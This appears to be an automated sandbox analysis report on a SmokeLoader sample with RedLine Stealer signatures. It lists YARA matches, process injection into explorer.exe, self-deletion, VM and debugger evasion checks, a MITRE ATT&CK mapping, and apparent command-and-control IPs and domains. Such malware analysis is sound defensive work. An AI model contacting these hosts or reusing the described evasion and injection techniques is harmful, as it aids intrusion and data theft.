Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/2@61/2

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Code function: 0_2_00514696 CreateToolhelp32Snapshot,Module32First,

0_2_00514696

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vbirvce

Jump to behavior

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Program Files\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe	ReversingLabs: Detection: 73%
Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Virustotal: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe "C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vbirvce C:\Users\user\AppData\Roaming\vbirvce

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Unpacked PE file: 0.2.50f86ebddd156619b173883981364d8955365d76d2c3a.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.guj:R;.ber:R;.medajim:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\vbirvce	Unpacked PE file: 5.2.vbirvce.400000.0.unpack .text:ER;.rdata:R;.data:W;.guj:R;.ber:R;.medajim:W;.rsrc:R; vs .text:EW;

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Static PE information: section name: .guj
Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Static PE information: section name: .ber
Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Static PE information: section name: .medajim
Source: vbirvce.1.dr	Static PE information: section name: .guj
Source: vbirvce.1.dr	Static PE information: section name: .ber
Source: vbirvce.1.dr	Static PE information: section name: .medajim

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_005180EF push esp; ret	0_2_005180F1
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00516492 push B63524ADh; retn 001Fh	0_2_005164C9
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00516F8F pushfd ; iretd	0_2_00516F90
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00621540 pushad ; ret	0_2_00621550
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_006C1540 pushad ; ret	5_2_006C1550
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00716F17 push esp; ret	5_2_00716F19
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00715DB7 pushfd ; iretd	5_2_00715DB8
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_007152BA push B63524ADh; retn 001Fh	5_2_007152F1

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vbirvce

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vbirvce

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\vbirvce:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\vbirvce	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\vbirvce	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe, 00000000.00000002.1763562549.00000000004EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKJ3
Source: vbirvce, 00000005.00000002.1996803380.00000000006EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 466	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3826	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 934	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 351	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 366	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 742	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 871	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 882	Jump to behavior

Source: C:\Windows\explorer.exe TID: 6344	Thread sleep count: 466 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6624	Thread sleep count: 3826 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6624	Thread sleep time: -382600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6436	Thread sleep count: 934 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6436	Thread sleep time: -93400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4476	Thread sleep count: 319 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5236	Thread sleep count: 351 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5236	Thread sleep time: -35100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5408	Thread sleep count: 366 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5408	Thread sleep time: -36600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6624	Thread sleep count: 742 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6624	Thread sleep time: -74200s >= -30000s	Jump to behavior

Source: explorer.exe, 00000001.00000000.1746429995.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1745872183.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1745872183.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1746429995.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1746429995.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1745872183.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1746429995.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1744130218.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1745872183.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00513F73 push dword ptr fs:[00000030h]	0_2_00513F73
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_0062092B mov eax, dword ptr fs:[00000030h]	0_2_0062092B
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Code function: 0_2_00620D90 mov eax, dword ptr fs:[00000030h]	0_2_00620D90
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_006C092B mov eax, dword ptr fs:[00000030h]	5_2_006C092B
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_006C0D90 mov eax, dword ptr fs:[00000030h]	5_2_006C0D90
Source: C:\Users\user\AppData\Roaming\vbirvce	Code function: 5_2_00712D9B push dword ptr fs:[00000030h]	5_2_00712D9B

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: vbirvce.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 116.58.10.60 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 123.213.233.131 80			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Thread created: C:\Windows\explorer.exe EIP: 8EF19A8			Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Thread created: unknown EIP: 87C19A8			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vbirvce	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1743880705.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1745872183.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1742931435.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1742931435.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1742931435.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1742931435.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	511 Security Software Discovery	Remote Services	Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	112 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
50f86ebddd156619b173883981364d8955365d76d2c3a.exe	74%	ReversingLabs	Win32.Trojan.Smokeloader
50f86ebddd156619b173883981364d8955365d76d2c3a.exe	60%	Virustotal		Browse
50f86ebddd156619b173883981364d8955365d76d2c3a.exe	100%	Avira	HEUR/AGEN.1310247
50f86ebddd156619b173883981364d8955365d76d2c3a.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\vbirvce	100%	Avira	HEUR/AGEN.1310247
C:\Users\user\AppData\Roaming\vbirvce	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\vbirvce	74%	ReversingLabs	Win32.Trojan.Smokeloader

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
unicea.ws	11%	Virustotal	Browse
nwgrus.ru	12%	Virustotal	Browse
tech-servers.in.net	4%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://aka.ms/odirmr	0%	URL Reputation	safe
https://aka.ms/odirmr	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	URL Reputation	safe
